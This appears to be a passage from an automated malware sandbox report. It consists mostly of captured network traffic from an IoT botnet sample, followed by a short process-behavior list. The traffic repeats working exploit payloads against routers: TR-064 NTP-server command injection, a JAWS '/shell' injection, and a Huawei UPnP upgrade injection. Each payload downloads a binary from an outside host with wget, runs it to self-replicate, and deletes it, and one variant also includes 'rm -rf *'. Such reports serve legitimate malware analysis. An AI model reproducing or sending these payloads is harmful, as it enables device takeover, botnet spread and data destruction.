                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          134192.168.2.134510097.176.110.2347547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.795377016 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          135192.168.2.135920678.214.249.247547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.796329021 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          136192.168.2.134923646.13.119.107547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.797302008 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          137192.168.2.1338182173.7.66.2397547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.814271927 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          138192.168.2.1338198173.7.66.2397547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:05.819463968 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          139192.168.2.1341914122.205.212.3780
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:06.521491051 CET363OUTGET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1
                                          User-Agent: Hello, Momentum
                                          Host: 127.0.0.1:80
                                          Content-Length: 430
                                          Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                          Connection: keep-alive
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          140192.168.2.1342710122.169.215.25280
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:06.522311926 CET363OUTGET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1
                                          User-Agent: Hello, Momentum
                                          Host: 127.0.0.1:80
                                          Content-Length: 430
                                          Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                          Connection: keep-alive
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          141192.168.2.1349664122.131.180.980
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:06.523226976 CET363OUTGET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1
                                          User-Agent: Hello, Momentum
                                          Host: 127.0.0.1:80
                                          Content-Length: 430
                                          Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                          Connection: keep-alive
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          142192.168.2.1356532157.107.233.24937215
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:06.563426018 CET844OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Content-Length: 430
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 38 2e 31 32 2e 31 30 37 2e 31 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 59 6f 75 72 4e 61 6d 65 2f 42 69 6e 4e 61 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 198.12.107.126 -l /tmp/bigH -r /YourName/BinName.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          143192.168.2.135927078.214.249.247547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:06.814353943 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          144192.168.2.1357744222.248.109.1547547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:06.815505981 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          145192.168.2.1354082117.72.105.567547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:06.816431046 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          146192.168.2.1347234151.218.121.697547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:06.817339897 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          147192.168.2.135915024.231.68.647547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:06.818150043 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          148192.168.2.133410070.13.124.37547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:06.819071054 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          149192.168.2.134516497.176.110.2347547
                                          TimestampBytes transferredDirectionData
                                          Nov 7, 2024 11:58:06.819842100 CET801OUTPOST /UD/act?1 HTTP/1.1
                                          Host: 127.0.0.1:7547
                                          User-Agent: Messiah/2.0
                                          SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                          Content-Type: text/xml
                                          Content-Length: 526
                                          <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`rm -rf *;cd /tmp;wget http://198.12.107.126/YourName/BinName.mips; chmod 777 BinName.mips; ./BinName.mips TR-064.Selfrep; rm -rf BinName.mips`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                          Data Raw:
                                          Data Ascii:


                                          System Behavior

                                          Start time (UTC):10:57:56
                                          Start date (UTC):07/11/2024
                                          Path:/tmp/debug.dbg.elf
                                          Arguments:/tmp/debug.dbg.elf
                                          File size:103152 bytes
                                          MD5 hash:fd7cbd6075d33e1bf912805ccbe2621d

                                          Start time (UTC):10:57:57
                                          Start date (UTC):07/11/2024
                                          Path:/tmp/debug.dbg.elf
                                          Arguments:-
                                          File size:103152 bytes
                                          MD5 hash:fd7cbd6075d33e1bf912805ccbe2621d

                                          Start time (UTC):10:57:57
                                          Start date (UTC):07/11/2024
                                          Path:/tmp/debug.dbg.elf
                                          Arguments:-
                                          File size:103152 bytes
                                          MD5 hash:fd7cbd6075d33e1bf912805ccbe2621d

                                          Start time (UTC):10:57:57
                                          Start date (UTC):07/11/2024
                                          Path:/tmp/debug.dbg.elf
                                          Arguments:-
                                          File size:103152 bytes
                                          MD5 hash:fd7cbd6075d33e1bf912805ccbe2621d

                                          Start time (UTC):10:57:57
                                          Start date (UTC):07/11/2024
                                          Path:/tmp/debug.dbg.elf
                                          Arguments:-
                                          File size:103152 bytes
                                          MD5 hash:fd7cbd6075d33e1bf912805ccbe2621d

                                          Start time (UTC):10:57:57
                                          Start date (UTC):07/11/2024
                                          Path:/tmp/debug.dbg.elf
                                          Arguments:-
                                          File size:103152 bytes
                                          MD5 hash:fd7cbd6075d33e1bf912805ccbe2621d

                                          Start time (UTC):10:57:57
                                          Start date (UTC):07/11/2024
                                          Path:/tmp/debug.dbg.elf
                                          Arguments:-
                                          File size:103152 bytes
                                          MD5 hash:fd7cbd6075d33e1bf912805ccbe2621d

                                          Start time (UTC):10:57:57
                                          Start date (UTC):07/11/2024
                                          Path:/tmp/debug.dbg.elf
                                          Arguments:-
                                          File size:103152 bytes
                                          MD5 hash:fd7cbd6075d33e1bf912805ccbe2621d